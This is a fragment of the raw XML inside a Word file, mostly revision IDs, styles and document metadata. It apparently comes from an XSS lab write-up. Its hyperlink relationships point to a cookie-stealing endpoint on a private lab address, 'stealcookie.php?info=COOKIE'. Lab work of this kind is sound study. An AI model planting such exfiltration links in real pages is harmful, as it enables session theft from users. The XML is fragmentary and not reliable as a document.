    <w:rsid w:val="00F54E1E"/>
    <w:rsid w:val="00F54F10"/>
    <w:rsid w:val="00F554B3"/>
    <w:rsid w:val="00F55BFA"/>
    <w:rsid w:val="00F55CC6"/>
    <w:rsid w:val="00F61A54"/>
    <w:rsid w:val="00F61C27"/>
    <w:rsid w:val="00F6216E"/>
    <w:rsid w:val="00F6324C"/>
    <w:rsid w:val="00F636BE"/>
    <w:rsid w:val="00F63825"/>
    <w:rsid w:val="00F64581"/>
    <w:rsid w:val="00F64CE8"/>
    <w:rsid w:val="00F65DB5"/>
    <w:rsid w:val="00F66170"/>
    <w:rsid w:val="00F66F12"/>
    <w:rsid w:val="00F67399"/>
    <w:rsid w:val="00F71B82"/>
    <w:rsid w:val="00F72748"/>
    <w:rsid w:val="00F72BA6"/>
    <w:rsid w:val="00F72D5A"/>
    <w:rsid w:val="00F73E37"/>
    <w:rsid w:val="00F75245"/>
    <w:rsid w:val="00F75DA0"/>
    <w:rsid w:val="00F75DAC"/>
    <w:rsid w:val="00F75F59"/>
    <w:rsid w:val="00F76CC1"/>
    <w:rsid w:val="00F77590"/>
    <w:rsid w:val="00F77DE6"/>
    <w:rsid w:val="00F8332F"/>
    <w:rsid w:val="00F8364D"/>
    <w:rsid w:val="00F83901"/>
    <w:rsid w:val="00F83DCC"/>
    <w:rsid w:val="00F860E9"/>
    <w:rsid w:val="00F87CFE"/>
    <w:rsid w:val="00F907E5"/>
    <w:rsid w:val="00F90B4C"/>
    <w:rsid w:val="00F91FC9"/>
    <w:rsid w:val="00F9276C"/>
    <w:rsid w:val="00F9378A"/>
    <w:rsid w:val="00F93C5C"/>
    <w:rsid w:val="00F94095"/>
    <w:rsid w:val="00F9466B"/>
    <w:rsid w:val="00F94745"/>
    <w:rsid w:val="00F94A92"/>
    <w:rsid w:val="00F94C92"/>
    <w:rsid w:val="00F9538C"/>
    <w:rsid w:val="00F95B38"/>
    <w:rsid w:val="00F95C08"/>
    <w:rsid w:val="00F96612"/>
    <w:rsid w:val="00F96BD8"/>
    <w:rsid w:val="00F96C92"/>
    <w:rsid w:val="00F97ACF"/>
    <w:rsid w:val="00F97C7A"/>
    <w:rsid w:val="00FA011C"/>
    <w:rsid w:val="00FA202A"/>
    <w:rsid w:val="00FA24B8"/>
    <w:rsid w:val="00FA2681"/>
    <w:rsid w:val="00FA3FEC"/>
    <w:rsid w:val="00FA51C4"/>
    <w:rsid w:val="00FB1C36"/>
    <w:rsid w:val="00FB200A"/>
    <w:rsid w:val="00FB21B2"/>
    <w:rsid w:val="00FB32B1"/>
    <w:rsid w:val="00FB32F4"/>
    <w:rsid w:val="00FB3F64"/>
    <w:rsid w:val="00FB6521"/>
    <w:rsid w:val="00FB66BB"/>
    <w:rsid w:val="00FB7435"/>
    <w:rsid w:val="00FB7DAE"/>
    <w:rsid w:val="00FC160A"/>
    <w:rsid w:val="00FC19D7"/>
    <w:rsid w:val="00FC217D"/>
    <w:rsid w:val="00FC2329"/>
    <w:rsid w:val="00FC3B36"/>
    <w:rsid w:val="00FC5B0D"/>
    <w:rsid w:val="00FC6D23"/>
    <w:rsid w:val="00FD00DC"/>
    <w:rsid w:val="00FD0115"/>
    <w:rsid w:val="00FD0CDA"/>
    <w:rsid w:val="00FD1C24"/>
    <w:rsid w:val="00FD230F"/>
    <w:rsid w:val="00FD498B"/>
    <w:rsid w:val="00FD63BE"/>
    <w:rsid w:val="00FD641E"/>
    <w:rsid w:val="00FD6480"/>
    <w:rsid w:val="00FD70AB"/>
    <w:rsid w:val="00FD70E4"/>
    <w:rsid w:val="00FD766F"/>
    <w:rsid w:val="00FD7B25"/>
    <w:rsid w:val="00FE0062"/>
    <w:rsid w:val="00FE04FB"/>
    <w:rsid w:val="00FE05B4"/>
    <w:rsid w:val="00FE0F9F"/>
    <w:rsid w:val="00FE12A7"/>
    <w:rsid w:val="00FE1EB1"/>
    <w:rsid w:val="00FE297E"/>
    <w:rsid w:val="00FE2D03"/>
    <w:rsid w:val="00FE3697"/>
    <w:rsid w:val="00FE3DF3"/>
    <w:rsid w:val="00FE5458"/>
    <w:rsid w:val="00FE59CE"/>
    <w:rsid w:val="00FE6C1E"/>
    <w:rsid w:val="00FF008B"/>
    <w:rsid w:val="00FF01E4"/>
    <w:rsid w:val="00FF07B6"/>
    <w:rsid w:val="00FF08F4"/>
    <w:rsid w:val="00FF17FF"/>
    <w:rsid w:val="00FF1A09"/>
    <w:rsid w:val="00FF2A06"/>
    <w:rsid w:val="00FF4AA2"/>
    <w:rsid w:val="00FF4F58"/>
    <w:rsid w:val="00FF5C3B"/>
    <w:rsid w:val="00FF5ECA"/>
    <w:rsid w:val="00FF62B0"/>
    <w:rsid w:val="00FF7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CE3989"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{808E4E24-484B-43E3-9756-2F890C0A4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1F3F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="009A7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672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92.168.65.128/XSS/stealcookie.php?info=COOKIE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http://192.168.65.128/XSS/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.65.128/XSS/stealcookie.php?info=COOKIE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192.168.65.128/XSS/stealcookie.php?info=COOKI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5195</TotalTime>
  <Pages>3</Pages>
  <Words>742</Words>
  <Characters>4236</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>35</Lines>
  <Paragraphs>9</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4969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Rui Zhao</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sunil Mamilla</cp:lastModifiedBy>
  <cp:revision>3920</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-19T16:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-10T21:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>